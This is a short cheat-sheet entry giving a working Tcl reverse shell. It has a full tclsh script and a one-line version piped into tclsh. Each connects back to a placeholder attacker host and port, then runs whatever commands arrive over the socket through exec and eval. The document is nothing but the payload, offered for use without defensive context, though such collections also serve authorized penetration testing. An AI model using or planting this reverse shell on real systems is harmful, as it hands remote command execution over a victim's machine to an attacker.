Reverse Shell TCL script (tclsh)
===================================
   #!/usr/bin/tclsh
   set s [socket <IP> <PORT>];
   while {42} {
   puts -nonewline $s "shell>";
   flush $s;
   gets $s c;
   set e "exec $c";
   if {![catch {set r [eval $e]} err]} {
   puts $s $r;
   }
   flush $s;
   }
   close $s;

* One liner
---------------------------------
  echo 'set s [socket RHOST RPORT];while 42 { puts -nonewline $s "sh>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

